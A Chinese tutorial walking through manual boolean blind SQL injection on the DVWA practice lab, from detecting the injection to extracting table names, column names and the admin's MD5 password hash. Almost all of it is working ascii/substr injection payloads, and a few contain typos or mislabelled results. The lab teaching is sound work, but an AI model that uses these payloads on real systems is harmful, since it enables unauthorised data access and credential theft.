盲注详解
一、sql盲注的过程
1、判断是否存在注入,注入是字符型还是数字型
2、猜解当前数据库名–>猜数据库的长度–>猜数据库的名称
3、猜解数据库中的表名–>猜表的数量–>猜表的长度–>猜表的名称
4、猜解表中的字段名–>猜列的数量–>猜列的长度–>列的名称
5、猜解账号和密码
二、手动盲注过程
1、判断是否存在注入,注入是字符型还是数字型
1 and 1=1
1 and 1=2
说明存在字符型SQL注入
因为假设是字符型在后台sql查询应该是
select * from users where id='1 and 1=1'
select * from users where id='1 and 1=2'
这样就不会报错
但如果是数字型,那么查询语句就会是
select * from users where id=1 and 1=1
select * from users where id=1 and 1=2
此时就会对第二条语句进行数值判断返回错误,但实际上,并未返回错误。故没有进行数值判断,是字符型注入。
2、猜解当前数据库名:猜数据库的长度–>猜数据库的名称
(1)猜数据库名长度
database()函数返回当前数据库的名称
length()用于获取字符串长度
1' and length(databbase())=1#
1' and length(database())=2#
1' and length(database())=3#
1' and length(database())=4#
所以当前数据库名有4个字符长度
(2)猜数据库的名称
ascii()返回字符的ASCII码
substr(str,start,length)返回字符串从str的start开始往后截取length长度的字符
1' and ascii(substr(database(),1,1))>90#
1' and ascii(substr(database(),1,1))>100#
第一位字符的ascii码在90-100之间
1' and ascii(substr(database(),1,1))>95#
第一位字符的ascii码在95-100之间
1' and ascii(substr(database(),1,1))>97#
第一位字符的ascii码在97-100之间
1' and ascii(substr(database(),1,1))>98#
第一位字符的ascii码在98-100之间
1' and ascii(substr(database(),1,1))>99#
第一位字符的ascii码在99-100之间
1' and ascii(substr(database(),1,1))=100#
所以第一位字符的ascii码是100
以此类推找出所有
结果是
1' and ascii(substr(database(),1,1))=100#
1' and ascii(substr(database(),2,1))=118#
1' and ascii(substr(database(),3,1))=119#
1' and ascii(substr(database(),4,1))=97#
对照ASCII表,所以当前数据库名为dvwa
3、猜解数据库中的表名:猜表的数量–>猜表的名称的长度–>猜表的名称
information_schema.tables 可查看表的属性
字段:
table_name 表名称
table_schema 数据表所属的数据库名
(1)猜表的数量
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=3#
所以表的数量是2
(2)猜表的名称的长度
limit 0,1 用于接收select查询的结果从第0行开始检索1行
substr(str,pos)返回从pos开始的所有字符
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#
(3)猜表的名称
按照2.2的方法猜表的名称
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103#g
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2))=117#u
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),3))=101#e
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),4))=115#s
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),5))=116#t
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),6))=98#b
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),7))=111#0
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),8))=111#0
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107#k
所以第一个表的表名为guestbook
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117#u
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2))=115#s
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3))=101#e
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4))=114#r
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5))=115#s
所以第二个表名是users
4、猜解表中的字段名–>猜列的数量–>猜列的长度–>列的名称
(1)猜列的数量
一个一个猜,这里省略
1' and (select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')=8 #
(2)猜列的名称的长度
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1 ) ,1 ) )=7#
第一列的列名长度为:7
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1 ) ,1) )=10#
第二的列名长度为:10
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1 ) ,1) )=9#
第三列的列名长度为:9
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,1) )=4#
第四列的列名长度为:4
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1 ) ,1) )=8#
第五列的列名长度为:8
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1 ) ,1) )=6#
第六列的列名长度为:6
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 6,1 ) ,1) )=10#
第七列的列名长度为:10
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 7,1 ) ,1) )=12#
第八列的列名长度为:12
(3)猜列的名称
猜解过程省略,我们就演示猜解user的过程
1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,1,1) )=117# u
1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,2,1) )=115# s
1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,3,1) )=101# e
1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,4,1) )=114# r
类似的我们猜解password
1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1 ) ,1,1) )=112# p
依此类推,这里就不展示了
我们可以推出
第三列为user,第四列为password
5、猜解账号和密码
user字段中第一个数据的长度
1’ and length(substr((select user from users limit 0,1),1))=5 #
第一个数据长度是5
user字段数据的名称(第一,第二…)
1’ and ascii(substr((select user from users limit 0,1),1,1))=97 #a
1’ and ascii(substr((select user from users limit 0,1),2,1))=100 #d
1’ and ascii(substr((select user from users limit 0,1),3,1))=109#m
第一个数据的第一个字母是a,…
以此类推 得到第一个数据是admin
然后查第二个数据
password字段中的数据个数
1’ and (select count(password) from users)=5 #
有5个数据(证明五个用户名对应了五个密码)
password字段中的数据长度
1’ and length(substr((select password from users limit 0,1),1))= 32#
第一个数据长度是32
用代码逐个猜解太麻烦
猜测是md5加密
方式①:用二分法依次猜解user/password字段中每组字段值的每个字符组成
方式②:利用日常积累经验猜测+运气,去碰撞完整字段值的全名
猜解验证:
1' and (select count(*) from users where user='admin')=1 #
显示成功 有个数据是admin
1’ and (select count(*) from users where user=‘admin’ and password=‘5f4dcc3b5aa765d61d8327deb882cf99’)=1 #
显示成功
方式①的猜解准确率和全面性较高,但是手工猜解花费的时间比较长;方式②猜解效率可能稍快一些,手工猜解的命中率较低,如果用户名or密码字典数据较少,可能会漏掉数据没有猜解出来,不确定性较多。实际猜解过程中,可以结合两种方法一起来尝试,互相补充。
进一步验证
将以上admin–password填写到前台登录界面的两个输入框中,尝试登录是否成功
附录:https://www.cmd5.com/ md5解密网站
破解的全部内容如下: